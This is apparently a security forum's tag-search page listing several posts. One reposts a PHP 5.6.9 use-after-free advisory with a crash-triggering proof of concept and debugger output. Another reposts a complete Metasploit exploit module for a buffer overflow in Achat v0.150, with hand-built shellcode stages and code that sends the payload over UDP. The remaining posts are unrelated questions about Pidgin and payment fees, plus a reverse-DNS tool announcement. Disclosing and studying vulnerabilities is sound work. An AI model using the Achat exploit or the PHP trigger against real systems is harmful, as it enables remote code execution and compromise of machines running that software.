Search the Community
Showing results for tags 'ptr'.
-
Use-After-Free in PHP May 20, 2015 Advisory ID: HTB23262 Product: PHP Vendor: PHP Group Vulnerable Versions: 5.6.9 and probably prior Tested Version: 5.6.9 Advisory Publication: May 20, 2015 [without technical details] Vendor Notification: May 20, 2015 Vendor Fix: June 2, 2015 Public Disclosure: June 10, 2015 Latest Update: June 9, 2015 Vulnerability Type: Use After Free [CWE-416] CVE Reference: Pending Risk Level: Medium CVSSv2 Base Score: 4.6 Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab Advisory Details: High-Tech Bridge Security Research Lab discovered use-after-free vulnerability in a popular programming language PHP, which can be exploited to cause crash and possibly execute arbitrary code on the target system. The vulnerability resides within the 'spl_heap_object_free_storage()' PHP function when trying to dereference already freed memory. A local attacker can cause segmentation fault or possibly execute arbitrary code on the target system with privileges of webserver. Below is a simple code that will trigger a crash: <?php class SplMinHeap1 extends SplMinHeap { public function compare($a, $ { return -parent::notexist($a, $; } } $h = new SplMinHeap1(); $h->insert(1); $h->insert(6); $h->insert(5); $h->insert(2); ?> Running the following PoC we get: gdb-peda$ r ~/Desktop/heap_uaf.php Starting program: /usr/local/bin/php ~/Desktop/heap_uaf.php PHP Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Program received signal SIGSEGV, Segmentation fault. [----------------------------------------------------------------------- ---registers-------------------------------------------------------------------- -------] RAX: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBX: 0x8000000 RCX: 0xcd0458 ("/home/test/De"...) RDX: 0x16f RSI: 0xcd0458 ("/home/test/De"...) RDI: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RSP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RIP: 0x82a96f (<zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10]) R8 : 0x269 R9 : 0x0 R10: 0x7fffffff9b20 --> 0x0 R11: 0x7ffff71102f0 --> 0xfffda6c0fffda3ef R12: 0x4209e0 (<_start>: xor ebp,ebp) R13: 0x7fffffffdf30 --> 0x2 R14: 0x0 R15: 0x0 [-------------------------------------------------------------------------- ---code------------------------------------------------------------------------- ----] 0x82a964 <zval_delref_p+1>: mov rbp,rsp 0x82a967 <zval_delref_p+4>: mov QWORD PTR [rbp-0x8],rdi 0x82a96b <zval_delref_p+8>: mov rax,QWORD PTR [rbp-0x8] => 0x82a96f <zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10] 0x82a972 <zval_delref_p+15>: lea edx,[rax-0x1] 0x82a975 <zval_delref_p+18>: mov rax,QWORD PTR [rbp-0x8] 0x82a979 <zval_delref_p+22>: mov DWORD PTR [rax+0x10],edx 0x82a97c <zval_delref_p+25>: mov rax,QWORD PTR [rbp-0x8] [-------------------------------------------------------------------- --------stack------------------------------------------------------------------- ----------] As seen above when trying to dereference the value from $rax (which has been already freed) PHP crashes. Stopped reason: SIGSEGV 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 411 return --pz->refcount__gc; Running the backtrace command we can see a couple of freed variables: zval_ptr, pz gdb-peda$ bt #0 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 #1 0x000000000082aafb in i_zval_ptr_dtor (zval_ptr=0x5a5a5a5a5a5a5a5a, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute.h:76 #2 0x000000000082bdcb in _zval_ptr_dtor (zval_ptr=0x7ffff7fcba88, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:424 #3 0x00000000006e5c1a in spl_heap_object_free_storage (object=0x7ffff7dfdfa0) at /home/test/Desktop/php-5.6.9/ext/spl/spl_heap.c:367 #4 0x000000000087f566 in zend_objects_store_free_object_storage (objects=0x102e640 <executor_globals+928>) at /home/test/Desktop/php-5.6.9/Zend/zend_objects_API.c:97 #5 0x000000000082b89e in shutdown_executor () at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:290 #6 0x0000000000841a4c in zend_deactivate () at /home/test/Desktop/php-5.6.9/Zend/zend.c:960 #7 0x00000000007a7c40 in php_request_shutdown (dummy=0x0) at /home/test/Desktop/php-5.6.9/main/main.c:1882 #8 0x00000000008f6501 in do_cli (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1177 #9 0x00000000008f6d8b in main (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1378 #10 0x00007ffff6faaec5 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6 #11 0x0000000000420a09 in _start () Lastly, from stack #2 we clearly see that the zval_ptr pointer (0x7ffff7fcba88) points to freed memory: gdb-peda$ x/50xw 0x7ffff7fcba88 0x7ffff7fcba88: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7 ffff7fcba98: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaa8: 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbab8: 0x5a5a5a5a 0x5a5a5a5a 0x5 a5a5a5a 0x5a5a5a5a 0x7ffff7fcbac8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbad8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbae8: 0x 5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaf8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb08: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5 a5a 0x7ffff7fcbb18: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb28 : 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb38: 0x5a5a5a5a 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb48: 0x5a5a5a5a 0x5a5a5a5a This vulnerability was successfully reproduced Ubuntu 14.04.1 LTS (32 bit and 64 bit) on the latest version of PHP 5.6.9. ImmuniWeb® On-Demand Web Application Penetration Test Solution: Apply Vendor's patch. More Information: https://bugs.php.net/bug.php?id=69737 72.52.91.13 Git - php-src.git/commit References: [1] High-Tech Bridge Advisory HTB23262 - https://www.htbridge.com/advisory/HTB23262 - Use-After-Free in PHP. [2] PHP - PHP: Hypertext Preprocessor - PHP is a popular general-purpose scripting language that is especially suited to web development. [3] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - a PCI compliant web application penetration test combined with managed vulnerability scan. Configure, schedule, and manage online 24/7. Source : https://www.htbridge.com/advisory/HTB23262
-
acum vreo 2 ore m-am hotarat sa pun pe nu din laptopuri fedora.... toate bune si frumoase dar spre rusinea mea nu stiu sa instalez pidgin ptr el.... am pidgin pe ubuntu pe win dar pe fedora.... habar nam cum ...... astept ceva idei...
-
Salut, as vrea sa.mi fac un cont online cu care sa platesc diferite facturi, comenzi etc.. dar as dori sa.mi spune.ti o "firma" care are cele mai mici taxe.. pana acm am auzit de paypal 2 euro ptr retragere si 0 ptr depozit daca nu ma insel.. as dori unul fara taxe sau mai mici daca exista.. lasa.ti aici un link si argumente ptr fiecare. Multumesc ! P.s sau macar sa aiba o retragere gratuita pe luna.. sau in genu..
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Achat v0.150 beta7 Buffer Overflow', 'Description' => %q{ This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By sending a crafted message to the default port 9256 it's possible to overwrites the SEH handler. Even when the exploit is reliable it depends of timing since there are two threads overflowing the stack in the same time. This module has been tested on Windows XP SP3 and Windows 7. }, 'Author' => [ 'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery 'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CWE', '121'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Payload' => { 'DisableNops' => true, 'Space' => 730, 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), 'StackAdjustment' => -3500, 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX' } }, 'Platform' => 'win', 'Targets' => [ # Tested OK Windows XP SP3, Windows 7 # Not working on Windows Server 2003 [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe ], 'Privileged' => false, 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 18 2014')) register_options( [ Opt::RPORT(9256) ], self.class) end def exploit connect_udp # 0055 00 ADD BYTE PTR SS:[EBP],DL # padding # 2A00 SUB AL,BYTE PTR DS:[EAX] # padding # 55 PUSH EBP # ebp holds a close pointer to the payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # mov eax, ebp # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 05 00140011 ADD EAX,11001400 # adjusting eax # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 50 PUSH EAX # eax points to the start of the shellcode # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # padding # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 59 POP ECX # padding # 0039 ADD BYTE PTR DS:[ECX],BH # padding first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00" sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46) sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset sploit << "\x61\x40" # POPAD + INC EAX sploit << target.ret # AChat.exe p/p/r address # adjusting the first thread's unicode payload, tricky asm-fu # the first seh exception jumps here, first_stage variable will be executed # by the second seh exception as well. It needs to be in sync with the second # thread, so that is why we adjust eax/ebp to have a close pointer to the # payload, then first_stage variable will take the rest of the job. # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 55 PUSH EBP # ebp with close pointer to payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # put ebp to eax # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place # 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more # 05 00140011 ADD EAX,11001400 # more adjusting # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 50 PUSH EAX # saving eax # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 5D POP EBP # mov ebp, eax sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload sploit << "\x00" + 'A' * 10 + "\x00" i = 0 while i < sploit.length do if i > 172000 Rex::sleep(1.0) end sent = udp_sock.put(sploit[i..i + 8192 - 1]) i += sent end disconnect_udp end end Source
-
Description Resolver is a windows based tool which designed to preform a reverse DNS Lookup for a given IP address or for a range of IP’s in order to find its PTR. Updated to Version 1.0.3 added dns records brute force. Download: Resolver | SourceForge.net